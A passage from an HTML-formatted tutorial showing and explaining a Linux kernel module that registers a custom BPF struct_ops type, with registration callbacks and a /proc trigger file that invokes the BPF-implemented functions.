&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Only one instance at a time */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmpxchg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;EEXIST&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_ops registered&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Unregistration function */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmpxchg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_warn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_ops: unexpected unreg&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_ops unregistered&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Struct ops definition */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_struct_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init_member&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unreg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cfi_stubs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;__bpf_ops_bpf_testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"bpf_testmod_ops"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;owner&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;THIS_MODULE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* Proc file write handler to trigger struct_ops */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;ssize_t&lt;/span&gt; &lt;span class="nf"&gt;trigger_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;__user&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;loff_t&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pos&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;copy_from_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;EFAULT&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;rcu_read_lock&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;rcu_dereference&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Calling struct_ops callbacks:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
            &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"test_1() returned: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"test_2(10, 20) returned: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"test_3() called with buffer&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"No struct_ops registered&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;rcu_read_unlock&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;proc_ops&lt;/span&gt; &lt;span class="n"&gt;trigger_proc_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proc_write&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;trigger_write&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;__init&lt;/span&gt; &lt;span class="nf"&gt;testmod_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Register the struct_ops */&lt;/span&gt;
    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;register_bpf_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_err&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Failed to register struct_ops: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create proc file for triggering */&lt;/span&gt;
    &lt;span class="n"&gt;trigger_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;proc_create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_trigger"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;0222&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;trigger_proc_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;trigger_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="cm"&gt;/* Note: No unregister function available in this kernel version */&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;ENOMEM&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod loaded with struct_ops support&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="n"&gt;__exit&lt;/span&gt; &lt;span class="nf"&gt;testmod_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;proc_remove&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;trigger_file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="cm"&gt;/* Note: struct_ops unregister happens automatically on module unload */&lt;/span&gt;
    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod unloaded&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;module_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;testmod_init&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;module_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;testmod_exit&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;MODULE_LICENSE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;MODULE_AUTHOR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"eBPF Example"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;MODULE_DESCRIPTION&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF struct_ops test module"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;MODULE_VERSION&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"1.0"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the Kernel Module Code
&lt;/h3&gt;

&lt;p&gt;This module may seem complex, but its structure is logical and serves a clear purpose: to safely expose a new programmable interface to the BPF subsystem. Let's break it down.&lt;/p&gt;

&lt;p&gt;First, we define the structure of our new operations. This is a simple C struct containing function pointers. This &lt;code&gt;struct bpf_testmod_ops&lt;/code&gt; is the interface that our BPF program will implement. Each function pointer defines a "slot" that a BPF program can fill.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, we have the core &lt;code&gt;bpf_struct_ops&lt;/code&gt; definition. This is a special kernel structure that describes our new &lt;code&gt;struct_ops&lt;/code&gt; type to the BPF system. It's the glue that connects our custom &lt;code&gt;bpf_testmod_ops&lt;/code&gt; to the BPF infrastructure.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_struct_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init_member&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unreg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cfi_stubs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;__bpf_ops_bpf_testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"bpf_testmod_ops"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
